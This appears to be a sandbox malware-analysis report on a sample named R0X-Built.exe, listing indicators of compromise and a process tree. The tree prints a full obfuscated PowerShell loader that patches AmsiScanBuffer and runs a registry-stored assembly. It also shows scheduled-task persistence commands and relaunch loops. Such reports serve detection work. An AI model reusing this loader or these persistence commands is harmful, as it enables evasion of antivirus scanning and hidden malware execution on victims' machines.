3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2816 R0X-Built.exe Token: SeDebugPrivilege 4788 $srr-powershell.exe Token: SeDebugPrivilege 1964 powershell.EXE Token: SeDebugPrivilege 1964 powershell.EXE Token: SeDebugPrivilege 3876 dllhost.exe Token: SeShutdownPrivilege 3540 Explorer.EXE Token: SeCreatePagefilePrivilege 3540 Explorer.EXE Token: SeShutdownPrivilege 3540 Explorer.EXE Token: SeCreatePagefilePrivilege 3540 Explorer.EXE Token: SeAssignPrimaryTokenPrivilege 1652 svchost.exe Token: SeIncreaseQuotaPrivilege 1652 svchost.exe Token: SeSecurityPrivilege 1652 svchost.exe Token: SeTakeOwnershipPrivilege 1652 svchost.exe Token: SeLoadDriverPrivilege 1652 svchost.exe Token: SeSystemtimePrivilege 1652 svchost.exe Token: SeBackupPrivilege 1652 svchost.exe Token: SeRestorePrivilege 1652 svchost.exe Token: SeShutdownPrivilege 1652 svchost.exe Token: SeSystemEnvironmentPrivilege 1652 svchost.exe Token: SeUndockPrivilege 1652 svchost.exe Token: SeManageVolumePrivilege 1652 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1652 svchost.exe Token: SeIncreaseQuotaPrivilege 1652 svchost.exe Token: SeSecurityPrivilege 1652 svchost.exe Token: SeTakeOwnershipPrivilege 1652 svchost.exe Token: SeLoadDriverPrivilege 1652 svchost.exe Token: SeSystemtimePrivilege 1652 svchost.exe Token: SeBackupPrivilege 1652 svchost.exe Token: SeRestorePrivilege 1652 svchost.exe Token: SeShutdownPrivilege 1652 svchost.exe Token: SeSystemEnvironmentPrivilege 1652 svchost.exe Token: SeUndockPrivilege 1652 svchost.exe Token: SeManageVolumePrivilege 1652 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1652 svchost.exe Token: SeIncreaseQuotaPrivilege 1652 svchost.exe Token: SeSecurityPrivilege 1652 svchost.exe Token: SeTakeOwnershipPrivilege 1652 svchost.exe Token: SeLoadDriverPrivilege 1652 svchost.exe Token: SeSystemtimePrivilege 1652 svchost.exe Token: SeBackupPrivilege 1652 svchost.exe Token: SeRestorePrivilege 1652 svchost.exe Token: SeShutdownPrivilege 1652 svchost.exe Token: SeSystemEnvironmentPrivilege 1652 svchost.exe Token: SeUndockPrivilege 1652 svchost.exe Token: SeManageVolumePrivilege 1652 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1652 svchost.exe Token: SeIncreaseQuotaPrivilege 1652 svchost.exe Token: SeSecurityPrivilege 1652 svchost.exe Token: SeTakeOwnershipPrivilege 1652 svchost.exe Token: SeLoadDriverPrivilege 1652 svchost.exe Token: SeSystemtimePrivilege 1652 svchost.exe Token: SeBackupPrivilege 1652 svchost.exe Token: SeRestorePrivilege 1652 svchost.exe Token: SeShutdownPrivilege 1652 svchost.exe Token: SeSystemEnvironmentPrivilege 1652 svchost.exe Token: SeUndockPrivilege 1652 svchost.exe Token: SeManageVolumePrivilege 1652 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1652 svchost.exe Token: SeIncreaseQuotaPrivilege 1652 svchost.exe Token: SeSecurityPrivilege 1652 svchost.exe Token: SeTakeOwnershipPrivilege 1652 svchost.exe Token: SeLoadDriverPrivilege 1652 svchost.exe Token: SeSystemtimePrivilege 1652 svchost.exe Token: SeBackupPrivilege 1652 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3628 Conhost.exe -
Suspicious use of UnmapMainImage 2 IoCs
pid Process 3552 RuntimeBroker.exe 3540 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2816 wrote to memory of 2908 2816 R0X-Built.exe 86 PID 2816 wrote to memory of 2908 2816 R0X-Built.exe 86 PID 2816 wrote to memory of 2908 2816 R0X-Built.exe 86 PID 2816 wrote to memory of 4788 2816 R0X-Built.exe 88 PID 2816 wrote to memory of 4788 2816 R0X-Built.exe 88 PID 2816 wrote to memory of 4788 2816 R0X-Built.exe 88 PID 2816 wrote to memory of 4592 2816 R0X-Built.exe 90 PID 2816 wrote to memory of 4592 2816 R0X-Built.exe 90 PID 2816 wrote to memory of 4592 2816 R0X-Built.exe 90 PID 2816 wrote to memory of 5016 2816 R0X-Built.exe 91 PID 2816 wrote to memory of 5016 2816 R0X-Built.exe 91 PID 2816 wrote to memory of 5016 2816 R0X-Built.exe 91 PID 4788 wrote to memory of 1480 4788 $srr-powershell.exe 95 PID 4788 wrote to memory of 1480 4788 $srr-powershell.exe 95 PID 4788 wrote to memory of 1480 4788 $srr-powershell.exe 95 PID 4788 wrote to memory of 4884 4788 $srr-powershell.exe 97 PID 4788 wrote to memory of 4884 4788 $srr-powershell.exe 97 PID 4788 wrote to memory of 4884 4788 $srr-powershell.exe 97 PID 1964 wrote to memory of 3876 1964 powershell.EXE 99 PID 1964 wrote to memory of 3876 1964 powershell.EXE 99 PID 1964 wrote to memory of 3876 1964 powershell.EXE 99 PID 1964 wrote to memory of 3876 1964 powershell.EXE 99 PID 1964 wrote to memory of 3876 1964 powershell.EXE 99 PID 1964 wrote to memory of 3876 1964 powershell.EXE 99 PID 1964 wrote to memory of 3876 1964 powershell.EXE 99 PID 1964 wrote to memory of 3876 1964 powershell.EXE 99 PID 4884 wrote to memory of 4804 4884 cmd.exe 100 PID 4884 wrote to memory of 4804 4884 cmd.exe 100 PID 4884 wrote to memory of 4804 4884 cmd.exe 100 PID 3876 wrote to memory of 612 3876 dllhost.exe 5 PID 3876 wrote to memory of 660 3876 dllhost.exe 7 PID 3876 wrote to memory of 952 3876 dllhost.exe 12 PID 3876 wrote to memory of 316 3876 dllhost.exe 13 PID 3876 wrote to memory of 388 3876 dllhost.exe 14 PID 3876 wrote to memory of 1016 3876 dllhost.exe 15 PID 3876 wrote to memory of 1076 3876 dllhost.exe 17 PID 3876 wrote to memory of 1084 3876 dllhost.exe 18 PID 3876 wrote to memory of 1140 3876 dllhost.exe 19 PID 3876 wrote to memory of 1164 3876 dllhost.exe 20 PID 3876 wrote to memory of 1264 3876 dllhost.exe 21 PID 3876 wrote to memory of 1304 3876 dllhost.exe 22 PID 3876 wrote to memory of 1320 3876 dllhost.exe 23 PID 3876 wrote to memory of 1388 3876 dllhost.exe 24 PID 3876 wrote to memory of 1428 3876 dllhost.exe 25 PID 3876 wrote to memory of 1508 3876 dllhost.exe 26 PID 3876 wrote to memory of 1520 3876 dllhost.exe 27 PID 3876 wrote to memory of 1628 3876 dllhost.exe 28 PID 3876 wrote to memory of 1708 3876 dllhost.exe 29 PID 3876 wrote to memory of 1752 3876 dllhost.exe 30 PID 3876 wrote to memory of 1772 3876 dllhost.exe 31 PID 3876 wrote to memory of 1864 3876 dllhost.exe 32 PID 3876 wrote to memory of 1976 3876 dllhost.exe 33 PID 3876 wrote to memory of 2036 3876 dllhost.exe 34 PID 3876 wrote to memory of 2040 3876 dllhost.exe 35 PID 3876 wrote to memory of 1648 3876 dllhost.exe 36 PID 3876 wrote to memory of 1652 3876 dllhost.exe 37 PID 3876 wrote to memory of 2132 3876 dllhost.exe 38 PID 3876 wrote to memory of 2204 3876 dllhost.exe 40 PID 3876 wrote to memory of 2240 3876 dllhost.exe 41 PID 3876 wrote to memory of 2436 3876 dllhost.exe 42 PID 3876 wrote to memory of 2444 3876 dllhost.exe 43 PID 3876 wrote to memory of 2644 3876 dllhost.exe 44 PID 3876 wrote to memory of 2652 3876 dllhost.exe 45 PID 3876 wrote to memory of 2748 3876 dllhost.exe 46
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:316
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1c06a4a9-299a-421b-b111-ee2680830265}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3876
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:388
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1016
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1076
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1084
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1140 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:yRbqKxkBLBGC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kIKZcIrBLDkUap,[Parameter(Position=1)][Type]$EvpYPqGOXT)$mjrbchkXwDT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+'e'+''+[Char](109)+''+'o'+''+'r'+''+[Char](121)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'elega'+[Char](116)+'e'+'T'+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+'u'+'b'+'l'+'i'+'c'+''+[Char](44)+''+'S'+''+'e'+''+'a'+''+[Char](108)+''+'e'+'d'+[Char](44)+''+'A'+'n'+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+'t'+''+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$mjrbchkXwDT.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+'p'+'e'+''+[Char](99)+''+[Char](105)+'alN'+'a'+'me'+[Char](44)+''+[Char](72)+'i'+[Char](100)+'eBy'+[Char](83)+''+[Char](105)+''+[Char](103)+',P'+[Char](117)+'bl'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kIKZcIrBLDkUap).SetImplementationFlags('R'+'u'+''+[Char](110)+'ti'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'ed');$mjrbchkXwDT.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+'c'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+','+''+[Char](78)+''+'e'+'w'+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'tu'+'a'+'l',$EvpYPqGOXT,$kIKZcIrBLDkUap).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+'a'+[Char](110)+''+'a'+'ge'+'d'+'');Write-Output $mjrbchkXwDT.CreateType();}$iBRONsafTUFNY=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+''+'e'+''+'m'+'.'+[Char](100)+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+'i'+'c'+'ro'+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'Un'+'s'+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+'t'+'h'+''+'o'+''+'d'+''+[Char](115)+'');$oJJvAUUYwDZIGg=$iBRONsafTUFNY.GetMethod('Ge'+[Char](116)+''+[Char](80)+''+'r'+'o'+'c'+''+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+[Char](101)+'ss',[Reflection.BindingFlags](''+'P'+''+'u'+''+'b'+'li'+[Char](99)+''+[Char](44)+'S'+[Char](116)+''+'a'+'ti'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JtaKoZFxsTBsaboEPKR=yRbqKxkBLBGC @([String])([IntPtr]);$BAWYDgRSqOeQXiSEsdcYBc=yRbqKxkBLBGC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gZeJXyUFPmq=$iBRONsafTUFNY.GetMethod(''+[Char](71)+''+[Char](101)+'tM'+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'H'+[Char](97)+''+[Char](110)+'d'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+'.d'+[Char](108)+''+[Char](108)+'')));$eyyMjRhtzeWSzu=$oJJvAUUYwDZIGg.Invoke($Null,@([Object]$gZeJXyUFPmq,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+'L'+'i'+'bra'+[Char](114)+''+'y'+''+[Char](65)+'')));$VDdYqysrBlgErsvzZ=$oJJvAUUYwDZIGg.Invoke($Null,@([Object]$gZeJXyUFPmq,[Object](''+'V'+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'P'+[Char](114)+'o'+[Char](116)+''+'e'+'c'+[Char](116)+'')));$lowLnOk=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eyyMjRhtzeWSzu,$JtaKoZFxsTBsaboEPKR).Invoke(''+[Char](97)+'m'+[Char](115)+'i.'+[Char](100)+''+[Char](108)+''+'l'+'');$iWGxsNEFnnKyakdnz=$oJJvAUUYwDZIGg.Invoke($Null,@([Object]$lowLnOk,[Object]('A'+'m'+''+'s'+''+[Char](105)+'S'+[Char](99)+''+'a'+''+[Char](110)+''+'B'+''+'u'+''+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$YXgOTalXiY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VDdYqysrBlgErsvzZ,$BAWYDgRSqOeQXiSEsdcYBc).Invoke($iWGxsNEFnnKyakdnz,[uint32]8,4,[ref]$YXgOTalXiY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$iWGxsNEFnnKyakdnz,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VDdYqysrBlgErsvzZ,$BAWYDgRSqOeQXiSEsdcYBc).Invoke($iWGxsNEFnnKyakdnz,[uint32]8,0x20,[ref]$YXgOTalXiY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue(''+'$'+'7'+'7'+''+'s'+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1964
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1164
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1264
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1304
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1388
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1428
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2644
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1508
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1520
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1628
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1752
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1772
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1864
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1976
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2040
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2132
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2204
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2240
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2652
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2748
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2768
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2828
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2860
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2872
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2984
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3460
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3540 -
C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:2908
-
-
C:\Windows\SysWOW64\Windows\$srr-powershell.exe"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:1480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GYL8qXV3KIzo.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2572
-
-
C:\Windows\SysWOW64\chcp.comchcp 650015⤵PID:4804
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost5⤵
- Runs ping.exe
PID:2540
-
-
C:\Windows\SysWOW64\Windows\$srr-powershell.exe"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:2012 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
PID:4888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GSQnNVHahbdP.bat" "6⤵PID:732
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:4736
-
-
C:\Windows\SysWOW64\chcp.comchcp 650017⤵PID:8
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost7⤵
- Runs ping.exe
PID:1988
-
-
C:\Windows\SysWOW64\Windows\$srr-powershell.exe"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:3568 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f8⤵
- Creates scheduled task(s)
PID:4080 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:3076
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qTabHFmwxCQs.bat" "8⤵PID:540
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:3872
-
-
C:\Windows\SysWOW64\chcp.comchcp 650019⤵PID:2760
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost9⤵
- Runs ping.exe
PID:4644
-
-
C:\Windows\SysWOW64\Windows\$srr-powershell.exe"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:3212 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f10⤵
- Creates scheduled task(s)
PID:2376 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵PID:2172
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ritNxtEkOTZf.bat" "10⤵PID:3616
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵PID:4808
-
-
C:\Windows\SysWOW64\chcp.comchcp 6500111⤵PID:1892
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost11⤵
- Runs ping.exe
PID:3208
-
-
C:\Windows\SysWOW64\Windows\$srr-powershell.exe"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"11⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:3300 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f12⤵
- Creates scheduled task(s)
PID:4036 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵PID:4056
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C8El6LET7fd1.bat" "12⤵PID:2108
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵PID:2940
-
-
C:\Windows\SysWOW64\chcp.comchcp 6500113⤵PID:5012
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost13⤵
- Runs ping.exe
PID:3360
-
-
C:\Windows\SysWOW64\Windows\$srr-powershell.exe"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"13⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:972 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f14⤵
- Creates scheduled task(s)
PID:2952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\S26TRUWfVEBU.bat" "14⤵PID:2416
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵PID:3340
-
-
C:\Windows\SysWOW64\chcp.comchcp 6500115⤵PID:1476
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost15⤵
- Runs ping.exe
PID:1420
-
-
C:\Windows\SysWOW64\Windows\$srr-powershell.exe"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"15⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:2468 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f16⤵
- Creates scheduled task(s)
PID:4952 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV117⤵PID:244
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hQpN0RDmDpq2.bat" "16⤵PID:1452
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV117⤵PID:4316
-
-
C:\Windows\SysWOW64\chcp.comchcp 6500117⤵PID:2288
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost17⤵
- Runs ping.exe
PID:4564
-
-
C:\Windows\SysWOW64\Windows\$srr-powershell.exe"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"17⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:1056 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f18⤵
- Creates scheduled task(s)
PID:1456 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV119⤵PID:2508
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\W1NxpLyUDbI2.bat" "18⤵PID:2924
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV119⤵PID:3020
-
-
C:\Windows\SysWOW64\chcp.comchcp 6500119⤵PID:4548
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost19⤵
- Runs ping.exe
PID:4392
-
-
C:\Windows\SysWOW64\Windows\$srr-powershell.exe"C:\Windows\SysWOW64\Windows\$srr-powershell.exe"19⤵
- Checks computer location settings
- Executes dropped EXE
